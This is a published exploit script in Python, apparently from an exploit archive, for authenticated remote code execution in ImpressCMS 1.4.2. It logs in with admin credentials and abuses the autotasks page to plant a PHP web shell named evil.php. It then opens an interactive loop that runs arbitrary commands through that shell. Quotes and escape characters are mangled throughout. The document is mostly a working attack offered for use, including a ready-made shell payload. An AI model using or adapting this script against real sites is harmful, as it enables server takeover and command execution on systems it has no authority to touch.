# Exploit Title: ImpressCMS 1.4.2 – Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.impresscms.org/
# Software Link: https://www.impresscms.org/modules/downloads/
# Version: 1.4.2
# Category: Webapps
# Tested on: Linux/Windows
# ImpressCMS is a multilingual content management system for the web
# Contains an endpoint that allows remote access
# Autotask page misconfigured, causing security vulnerability
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
import requests
import argparse
import sys
from time import sleep
session = requests.session()
def main():
parser = argparse.ArgumentParser(description=’Impresscms Version 1.4.2 – Remote Code Execution (Authenticated)’)
parser.add_argument(‘-u’, ‘–host’, type=str, required=True)
parser.add_argument(‘-l’, ‘–login’, type=str, required=True)
parser.add_argument(‘-p’, ‘–password’, type=str, required=True)
args = parser.parse_args()
print(“nImpresscms Version 1.4.2 – Remote Code Execution (Authenticated)”,
“nExploit Author: Halit AKAYDIN (hLtAkydn)n”)
exploit(args)
def countdown(time_sec):
while time_sec:
mins, secs = divmod(time_sec, 60)
timeformat = ‘{:02d}’.format(secs)
print(“[“+timeformat+”] The task is expected to run!”, end=’r’)
sleep(1)
time_sec -= 1
def exploit(args):
#Check http or https
if args.host.startswith((‘http://’, ‘https://’)):
print(“[?] Check Url…n”)
args.host = args.host
if args.host.endswith(‘/’):
args.host = args.host[:-1]
sleep(2)
else:
print(“n[?] Check Adress…n”)
args.host = “http://” + args.host
args.host = args.host
if args.host.endswith(‘/’):
args.host = args.host[:-1]
sleep(2)
try:
response = requests.get(args.host)
if response.status_code != 200:
print(“[-] Address not reachable!”)
sleep(2)
exit(1)
except requests.ConnectionError as exception:
print(“[-] Address not reachable”)
exit(1)
response = requests.get(args.host + “/evil.php”)
if response.status_code == 200:
print(“[*] Exploit file exists!n”)
sleep(2)
print(“[+] Exploit Done!n”)
while True:
cmd = input(“$ “)
url = args.host + “/evil.php?cmd=” + cmd
headers = {
“Upgrade-Insecure-Requests”: “1”,
“User-Agent”: “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0”
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == “”:
print(cmd + “: command not foundn”)
else:
print(response.text)
else:
#Login and set cookie
url = args.host + “/user.php”
cookies = {
“ICMSSESSION”: “gjj2svl7qjqorj5rs87b6thmi5”
}
headers = {
“Cache-Control”: “max-age=0”,
“Upgrade-Insecure-Requests”: “1”,
“Origin”: args.host,
“Content-Type”: “application/x-www-form-urlencoded”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36”,
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9”,
“Referer”: args.host,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “en-US,en;q=0.9”,
“Connection”: “close”
}
data = {
“uname”: args.login,
“pass”: args.password,
“xoops_redirect”: “/”,
“op”: “login”
}
response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
new_cookies = session.cookies.get(“ICMSSESSION”)
if (new_cookies is None):
print(“[-] Login Failed…n”)
print(“Your username or password is incorrect.”)
sleep(2)
exit(1)
else:
print(“[+] Success Login…n”)
sleep(2)
# Create Tasks
url = args.host + “/modules/system/admin.php?fct=autotasks&op=mod”
cookies = {
“ICMSSESSION”: new_cookies
}
headers = {
“Cache-Control”: “max-age=0”,
“Upgrade-Insecure-Requests”: “1”,
“Origin”: args.host,
“Content-Type”: “multipart/form-data; boundary=—-WebKitFormBoundaryZ2hA91yNO8FWPZmk”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36”,
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9”,
“Referer”: args.host + “/modules/system/admin.php?fct=autotasks&op=mod”,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “en-US,en;q=0.9”,
“Connection”: “close”
}
data = “——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_id”rnrn0rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_lastruntime”rnrn0rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_name”rnrnrcern——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_code”rnrnfile_put_contents(‘../evil.php’, “<?php system(x24_GET[‘cmd’]); ?>”);rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_repeat”rnrn0rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_interval”rnrn0001rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_onfinish”rnrn0rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_enabled”rnrn1rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_type”rnrn:customrn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_addon_id”rnrnrn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”icms_page_before_form”rnrn”+args.host+”/modules/system/admin.php?fct=autotasksrn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”op”rnrnaddautotasksrn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”modify_button”rnrnSubmitrn——WebKitFormBoundaryZ2hA91yNO8FWPZmk–rn”
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
if response.headers.get(“location”) == args.host + “/modules/system/admin.php?fct=autotasks”:
print(“[*] Task Create.n”)
sleep(2)
countdown(60)
print(“nn[+] Exploit Done!n”)
sleep(2)
while True:
cmd = input(“$ “)
url = args.host + “/evil.php?cmd=” + cmd
headers = {
“Upgrade-Insecure-Requests”: “1”,
“User-Agent”: “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0”
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == “”:
print(cmd + “: command not foundn”)
else:
print(response.text)
elif response.headers.get(“location”) == args.host + “/user.php”:
print(“[!] Unauthorized user!nn”)
print(“Requires user with create task permissions.”)
sleep(2)
else:
pass
if __name__ == ‘__main__’:
main()